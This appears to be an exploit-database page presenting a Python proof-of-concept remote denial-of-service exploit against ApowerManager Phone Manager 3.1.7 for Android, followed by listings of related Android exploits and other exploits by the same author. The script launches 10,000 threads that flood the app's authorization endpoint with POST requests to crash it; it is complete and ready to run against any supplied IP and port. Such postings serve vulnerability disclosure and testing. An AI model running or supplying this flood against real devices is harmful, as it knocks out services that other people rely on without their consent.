Become a patron and gain access to the dashboard, Schedule scans, API and Search patron
Author
s4vitar
Platform
android
Release date
2019-02-14
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 | #!/usr/bin/python #coding: utf-8 # ********************************************************************* # * Author: Marcelo Vázquez (aka s4vitar) * # * ApowerManager Remote Denial of Service (DoS) / Application Crash * # ********************************************************************* # Exploit Title: ApowerManager - Phone Manager Remote Denial of Service (DoS) / Application Crash # Date: 2019-02-14 # Exploit Author: Marcelo Vázquez (aka s4vitar) # Vendor Homepage: https://www.apowersoft.com/phone-manager # Software Link: https://www.apkmonk.com/download-app/com.apowersoft.phone.manager/4_com.apowersoft.phone.manager_2019-01-08.apk/ # Version: <= ApowerManager - Phone Manager 3.1.7 # Tested on: Android import sys, requests, threading, signal def handler(signum, frame): print '\nFinishing program...\n' sys.exit(0) if len(sys.argv) != 3: print "\nUsage: python " + sys.argv[0] + " <ip_address> <port>\n" print "Example: python apowermanager_dos.py 192.168.1.125 2333\n" sys.exit(0) def startAttack(url): url_destination = url + '/?Key=PhoneRequestAuthorization' headers = {'Origin': url, 'Accept-Encoding': 'gzip, deflate, br', 'Accept-Language': 'es-ES,es;q=0.9,en;q=0.8', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36', 'Content-Type': 'text/plain;charset=UTF-8', 'accept': 'text/plain', 'Referer': url, 'Connection': 'keep-alive'} r = requests.post(url_destination, headers=headers) if __name__ == '__main__': signal.signal(signal.SIGINT, handler) url = 'http://' + sys.argv[1] + ':' + sys.argv[2] threads = [] for i in xrange(0, 10000): t = threading.Thread(target=startAttack, args=(url,)) threads.append(t) for x in threads: x.start() for x in threads: x.join() |
Release Date | Title | Type | Platform | Author |
---|---|---|---|---|
2020-07-02 | "WhatsApp Remote Code Execution - Paper" | webapps | android | "ashu Jaiswal" |
2020-02-24 | "Android Binder - Use-After-Free (Metasploit)" | local | android | Metasploit |
2020-01-14 | "Android - ashmem Readonly Bypasses via remap_file_pages() and ASHMEM_UNPIN" | dos | android | "Google Security Research" |
2020-01-14 | "WeChat - Memory Corruption in CAudioJBM::InputAudioFrameToJBM" | dos | android | "Google Security Research" |
2019-11-08 | "Android Janus - APK Signature Bypass (Metasploit)" | local | android | Metasploit |
2019-10-16 | "Whatsapp 2.19.216 - Remote Code Execution" | remote | android | "Valerio Brussani" |
2019-10-04 | "Android - Binder Driver Use-After-Free" | local | android | "Google Security Research" |
2019-08-30 | "Canon PRINT 2.5.5 - Information Disclosure" | local | android | 0x48piraj |
2019-07-24 | "Android 7 < 9 - Remote Code Execution" | remote | android | "Marcin Kozlowski" |
2019-07-15 | "Android 7 - 9 VideoPlayer - 'ihevcd_parse_pps' Out-of-Bounds Write" | dos | android | "Marcin Kozlowski" |
Release Date | Title | Type | Platform | Author |
---|---|---|---|---|
2019-10-16 | "X.Org X Server 1.20.4 - Local Stack Overflow" | local | linux | s4vitar |
2019-06-14 | "CentOS 7.6 - 'ptrace_scope' Privilege Escalation" | local | linux | s4vitar |
2019-06-10 | "Ubuntu 18.04 - 'lxd' Privilege Escalation" | local | linux | s4vitar |
2019-03-15 | "NetData 1.13.0 - HTML Injection" | webapps | multiple | s4vitar |
2019-02-28 | "FTP Server 1.32 - Denial of Service" | dos | android | s4vitar |
2019-02-21 | "AirDrop 2.0 - Denial of Service (DoS)" | dos | android | s4vitar |
2019-02-21 | "ScreenStream 3.0.15 - Denial of Service" | dos | android | s4vitar |
2019-02-15 | "AirMore 1.6.1 - Denial of Service (PoC)" | dos | android | s4vitar |
2019-02-14 | "ApowerManager 3.1.7 - Phone Manager Remote Denial of Service (PoC)" | dos | android | s4vitar |
2019-02-11 | "AirDroid 4.2.1.6 - Denial of Service" | dos | android | s4vitar |
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/46380/?format=json')
For full documentation follow the link above